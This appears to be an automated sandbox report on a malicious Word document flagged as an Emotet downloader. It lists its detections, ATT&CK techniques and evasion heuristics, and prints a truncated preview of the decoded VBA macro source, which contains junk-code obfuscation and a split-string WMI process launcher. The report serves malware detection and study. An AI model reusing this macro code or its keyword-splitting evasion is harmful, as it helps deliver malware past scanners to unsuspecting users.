MALICIOUS
302
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1105 Ingress Tool Transfer
The sample is a malicious Office document containing VBA macros. The macros utilize obfuscated API calls, specifically reassembling 'winmgmts' to interact with WMI. This is used to launch a process, indicative of a downloader attempting to fetch and execute a second-stage payload. ClamAV detection further confirms its malicious nature, identifying it as Emotet.
Heuristics 8
-
ClamAV: Doc.Downloader.Emotet-6861363-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6861363-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATEVBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
-
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATIONVBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 58508 bytes |
SHA-256: 664ea8f24f244a0d7a8ed792d46f3c74f0c6cd7378787f3dba71620a982eaaa1 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "V_230_9"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "w098_247"
Function c8_5444()
If a3_026_ <> O2__261_ Then
T96_10 = (770826318)
n472_1 = w42_8__ * 532545034 + Q__267 + CLng(n26_155)
n_1__8 = 881043409 / Hex(q3__750 / Chr(G70___8 - CDate(287670832)) * 416167380 / 117445345) / p0_020 - Fix(375600404)
W_1_919 = (999272155)
End If
If G5_66_84 <> a_674_5 Then
i0_88966 = (288240159)
z88_85 = V_01__50 * 957405764 + T06_633 + CLng(m174_3)
V0___78_ = 926065785 / Hex(i4_78917 / Chr(F969_26 - CDate(421213212)) * 384465904 / 232963777) / R45__93 - Fix(916882504)
i331_8_ = (644105090)
End If
If K_68_7 <> J3_4_3_ Then
S6_778 = (825579811)
n57_2049 = j_49_4 * 333550705 + t4994_3 + CLng(b0682_09)
D5_429 = 14273255 / Hex(q_4304 / Chr(I_3__251 - CDate(371285898)) * 904406205 / 49191880) / v551_4_ - Fix(997730205)
N_1_258_ = (319918674)
End If
If N76667_7 <> r92727__ Then
p9560990 = (727845325)
v7_63311 = l_6__51 * 282799733 + X87_921 + CLng(s3_22_24)
R__7420_ = 493304185 / Hex(c69246_ / Chr(F354_7__ - CDate(298882482)) * 960605033 / 836095279) / V__014__ - Fix(124294691)
V5_21_83 = (318486739)
End If
If P03_04 <> a86_1_6 Then
i989548_ = (242748586)
l_3__097 = k_0_1_8_ * 219892311 + m0_0__ + CLng(f_6949_)
n63____ = 665307247 / Hex(S5_31_9_ / Chr(G3_02__ - CDate(290535591)) * 324560574 / 459625322) / f___94 - Fix(984765805)
C__929_6 = (810789911)
End If
If z5_79_1 <> S550501 Then
z3_142 = (393722264)
P055689_ = B2434_ * 621186981 + V0_877_2 + CLng(G_2230_1)
r285__20 = 996005834 / Hex(f87115 / Chr(t77__36_ - CDate(31842505)) * 50636445 / 489471890) / d0253997 - Fix(342101052)
H_8301 = (164840102)
End If
If n76_221 <> A6703_ Then
Y607248 = (824657245)
N__3727_ = z697__66 * 532697624 + I791_2 + CLng(L_1_4_6)
v6345962 = 804960786 / Hex(N_25__28 / Chr(l_545_ - CDate(961294191)) * 448017715 / 391645398) / d9824_ - Fix(845945265)
v__766 = (769996121)
End If
If c_8403 <> D4239_ Then
L5_460 = (527045217)
l__832 = b1_1_8 * 217421107 + A4__7_8 + CLng(A34__4_)
U60_2_12 = 932873322 / Hex(O____0 / Chr(N4146_22 - CDate(946083372)) * 737979609 / 213364163) / u8___3 - Fix(104734780)
U_212474 = (882317989)
End If
If j875_77 <> G1_467 Then
F5583268 = (381361977)
d_3__0 = i2_7_35 * 682618047 + b_2_29_ + CLng(Y61_77)
M_4_801_ = 868256638 / Hex(V6_782_2 / Chr(k9_1031 - CDate(522084028)) * 336796051 / 251930872) / O2_88_3 - Fix(14802368)
L_799_ = (551758991)
End If
End Function
Function i889__78(S82__2, F5856__)
On Error Resume Next
If f70__0 <> i727_05 Then
C_88_0 = (701666692)
z4__7_ = z2_7_6_ * 546319801 + l84_3143 + CLng(f0__070)
m1425_4 = 577281025 / Hex(S018__ / Chr(G1_947 - CDate(842215600)) * 52234016 / 304424525) / o7_1_9_7 - Fix(463787604)
z7911_ = (589730947)
End If
If G_0_2_ <> c20_0_5 Then
w421944_ = (296616127)
E4998618 = N8194_ * 118709690 + a01_88 + CLng(a861_1)
O7235__ = 812397113 / Hex(n16553_2 / Chr(B61175 - CDate(503602961)) * 23250855 / 113007599) / Y72_81_ - Fix(864357150)
M4___033 = (214042891)
End If
If s58_328 <> p49_29 Then
m7___64 = (960155993)
p____5 = k082593_ * 870771264 + t9_1___ + CLng(s_5_7__)
t4474__ = 846662617 / Hex(P__8_7 / Chr(z_2344_1 - CDate(792345129)) * 318363887 / 744747551) / t001446 - Fix(325817288)
z39___ = (367146655)
End If
Set d2_098 = GetObject("winmgm" + "ts:Win" + "32_Proce" + "ssStartup")
If Y0_4_45 <> p780094_ Then
U__449_ = (100599222)
V_6437_ = N_894_61 * 816378391 + i01_1887 + CLng(A2278_2)
N0___0_ = 308482676 / Hex(v9_67_0 / Chr(M9_8_44 - CDate(849772435)) * 415642489 / 163288231) / N_4720_3 - Fix(225637322)
u_811_ = (614632411)
End If
If w94_86 <> S6008_3_ Then
s599__ = (378927899)
R61_58 = z6__
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.